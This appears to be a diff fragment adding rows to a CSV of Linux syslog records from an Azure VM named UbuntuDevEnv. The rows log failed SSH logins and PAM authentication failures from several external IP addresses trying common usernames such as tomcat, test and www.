+6203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:01,UbuntuDevEnv,2019-06-26 16:46:00,auth,UbuntuDevEnv,info,Failed password for invalid user analytics from 80.108.220.67 port 44806 ssh2,40286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,80.108.220.6,44806,,
+6204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:01,UbuntuDevEnv,2019-06-26 16:46:00,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 44806:11: Bye Bye [preauth],40286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,44806,,
+6205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:01,UbuntuDevEnv,2019-06-26 16:46:00,auth,UbuntuDevEnv,info,Disconnected from invalid user analytics 80.108.220.67 port 44806 [preauth],40286,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,analytics,80.108.220.6,44806,,
+6206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:02,UbuntuDevEnv,2019-06-26 16:46:01,auth,UbuntuDevEnv,info,Invalid user vanilla from 81.0.212.18 port 59252,40314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vanilla,81.0.212.1,59252,,
+6207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:02,UbuntuDevEnv,2019-06-26 16:46:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,40314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:02,UbuntuDevEnv,2019-06-26 16:46:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:03,UbuntuDevEnv,2019-06-26 16:46:02,auth,UbuntuDevEnv,info,Invalid user mc from 171.8.199.77 port 57594,40308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,171.8.199.7,57594,,
+6210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:03,UbuntuDevEnv,2019-06-26 16:46:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:03,UbuntuDevEnv,2019-06-26 16:46:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,40308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+6212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:04,UbuntuDevEnv,2019-06-26 16:46:03,auth,UbuntuDevEnv,info,Failed password for invalid user vanilla from 81.0.212.18 port 59252 ssh2,40314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vanilla,81.0.212.1,59252,,
+6213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:04,UbuntuDevEnv,2019-06-26 16:46:04,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 59252:11: Bye Bye [preauth],40314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,59252,,
+6214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:04,UbuntuDevEnv,2019-06-26 16:46:04,auth,UbuntuDevEnv,info,Disconnected from invalid user vanilla 81.0.212.18 port 59252 [preauth],40314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vanilla,81.0.212.1,59252,,
+6215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:05,UbuntuDevEnv,2019-06-26 16:46:04,auth,UbuntuDevEnv,info,Failed password for invalid user mc from 171.8.199.77 port 57594 ssh2,40308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,171.8.199.7,57594,,
+6216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:05,UbuntuDevEnv,2019-06-26 16:46:04,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 57594:11: Bye Bye [preauth],40308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,57594,,
+6217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:05,UbuntuDevEnv,2019-06-26 16:46:04,auth,UbuntuDevEnv,info,Disconnected from invalid user mc 171.8.199.77 port 57594 [preauth],40308,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mc,171.8.199.7,57594,,
+6218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:09,UbuntuDevEnv,2019-06-26 16:46:09,auth,UbuntuDevEnv,info,Invalid user tomcat from 35.154.19.93 port 34046,40344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,35.154.19.9,34046,,
+6219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:09,UbuntuDevEnv,2019-06-26 16:46:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:09,UbuntuDevEnv,2019-06-26 16:46:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:12,UbuntuDevEnv,2019-06-26 16:46:11,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 35.154.19.93 port 34046 ssh2,40344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,35.154.19.9,34046,,
+6222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:12,UbuntuDevEnv,2019-06-26 16:46:11,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 34046:11: Normal Shutdown, Thank you for playing [preauth]",40344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,34046,,
+6223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:12,UbuntuDevEnv,2019-06-26 16:46:11,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 35.154.19.93 port 34046 [preauth],40344,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,35.154.19.9,34046,,
+6224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:42,UbuntuDevEnv,2019-06-26 16:46:41,auth,UbuntuDevEnv,info,Invalid user tomcat from 35.154.19.93 port 37360,40456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,35.154.19.9,37360,,
+6225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:42,UbuntuDevEnv,2019-06-26 16:46:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:42,UbuntuDevEnv,2019-06-26 16:46:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:44,UbuntuDevEnv,2019-06-26 16:46:43,auth,UbuntuDevEnv,info,Failed password for invalid user tomcat from 35.154.19.93 port 37360 ssh2,40456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,35.154.19.9,37360,,
+6228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:44,UbuntuDevEnv,2019-06-26 16:46:43,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 35.154.19.93 port 37360 [preauth],40456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,35.154.19.9,37360,,
+6229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:46:44,UbuntuDevEnv,2019-06-26 16:46:43,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 37360:11: Normal Shutdown, Thank you for playing [preauth]",40456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,37360,,
+6230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:15,UbuntuDevEnv,2019-06-26 16:47:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=test,40574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,35.154.19.9,,0,
+6231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:18,UbuntuDevEnv,2019-06-26 16:47:17,auth,UbuntuDevEnv,info,Failed password for test from 35.154.19.93 port 40666 ssh2,40574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40666,,
+6232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:18,UbuntuDevEnv,2019-06-26 16:47:17,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 40666:11: Normal Shutdown, Thank you for playing [preauth]",40574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,40666,,
+6233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:18,UbuntuDevEnv,2019-06-26 16:47:17,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 35.154.19.93 port 40666 [preauth],40574,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,35.154.19.9,40666,,
+6234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:33,UbuntuDevEnv,2019-06-26 16:47:32,auth,UbuntuDevEnv,info,Invalid user awharton from 81.0.212.18 port 40383,40639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,awharton,81.0.212.1,40383,,
+6235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:33,UbuntuDevEnv,2019-06-26 16:47:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,40639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:33,UbuntuDevEnv,2019-06-26 16:47:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:34,UbuntuDevEnv,2019-06-26 16:47:34,auth,UbuntuDevEnv,info,Failed password for invalid user awharton from 81.0.212.18 port 40383 ssh2,40639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,awharton,81.0.212.1,40383,,
+6238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:35,UbuntuDevEnv,2019-06-26 16:47:34,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 40383:11: Bye Bye [preauth],40639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,40383,,
+6239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:35,UbuntuDevEnv,2019-06-26 16:47:34,auth,UbuntuDevEnv,info,Disconnected from invalid user awharton 81.0.212.18 port 40383 [preauth],40639,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,awharton,81.0.212.1,40383,,
+6240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:48,UbuntuDevEnv,2019-06-26 16:47:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=test,40690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,35.154.19.9,,0,
+6241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:50,UbuntuDevEnv,2019-06-26 16:47:50,auth,UbuntuDevEnv,info,Failed password for test from 35.154.19.93 port 43956 ssh2,40690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43956,,
+6242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:50,UbuntuDevEnv,2019-06-26 16:47:50,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 35.154.19.93 port 43956 [preauth],40690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,35.154.19.9,43956,,
+6243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:47:50,UbuntuDevEnv,2019-06-26 16:47:50,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 43956:11: Normal Shutdown, Thank you for playing [preauth]",40690,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,43956,,
+6244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:18,UbuntuDevEnv,2019-06-26 16:48:18,auth,UbuntuDevEnv,info,Connection closed by 171.8.199.77 port 44078 [preauth],40790,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,44078,,
+6245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:21,UbuntuDevEnv,2019-06-26 16:48:20,auth,UbuntuDevEnv,info,Invalid user teste from 35.154.19.93 port 47258,40812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,35.154.19.9,47258,,
+6246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:21,UbuntuDevEnv,2019-06-26 16:48:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:21,UbuntuDevEnv,2019-06-26 16:48:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:24,UbuntuDevEnv,2019-06-26 16:48:23,auth,UbuntuDevEnv,info,Failed password for invalid user teste from 35.154.19.93 port 47258 ssh2,40812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,35.154.19.9,47258,,
+6249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:24,UbuntuDevEnv,2019-06-26 16:48:23,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 47258:11: Normal Shutdown, Thank you for playing [preauth]",40812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,47258,,
+6250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:24,UbuntuDevEnv,2019-06-26 16:48:23,auth,UbuntuDevEnv,info,Disconnected from invalid user teste 35.154.19.93 port 47258 [preauth],40812,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,35.154.19.9,47258,,
+6251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:54,UbuntuDevEnv,2019-06-26 16:48:53,auth,UbuntuDevEnv,info,Invalid user teste from 35.154.19.93 port 50552,40929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,35.154.19.9,50552,,
+6252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:54,UbuntuDevEnv,2019-06-26 16:48:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:54,UbuntuDevEnv,2019-06-26 16:48:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,40929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+6254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:56,UbuntuDevEnv,2019-06-26 16:48:55,auth,UbuntuDevEnv,info,Failed password for invalid user teste from 35.154.19.93 port 50552 ssh2,40929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,35.154.19.9,50552,,
+6255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:56,UbuntuDevEnv,2019-06-26 16:48:55,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 50552:11: Normal Shutdown, Thank you for playing [preauth]",40929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,50552,,
+6256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:48:56,UbuntuDevEnv,2019-06-26 16:48:55,auth,UbuntuDevEnv,info,Disconnected from invalid user teste 35.154.19.93 port 50552 [preauth],40929,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,teste,35.154.19.9,50552,,
+6257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:02,UbuntuDevEnv,2019-06-26 16:49:01,auth,UbuntuDevEnv,info,Invalid user www from 81.0.212.18 port 49727,40957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,81.0.212.1,49727,,
+6258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:02,UbuntuDevEnv,2019-06-26 16:49:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+6259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:02,UbuntuDevEnv,2019-06-26 16:49:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,40957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+6260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:03,UbuntuDevEnv,2019-06-26 16:49:03,auth,UbuntuDevEnv,info,Failed password for invalid user www from 81.0.212.18 port 49727 ssh2,40957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,81.0.212.1,49727,,
+6261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:03,UbuntuDevEnv,2019-06-26 16:49:03,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 49727:11: Bye Bye [preauth],40957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,49727,,
+6262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:49:03,UbuntuDevEnv,2019-06-26 16:49:03,auth,UbuntuDevEnv,info,Disconnected from invalid user www 81.0.212.18 port 49727 [preauth],40957,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,www,81.0.212.1,49727,,
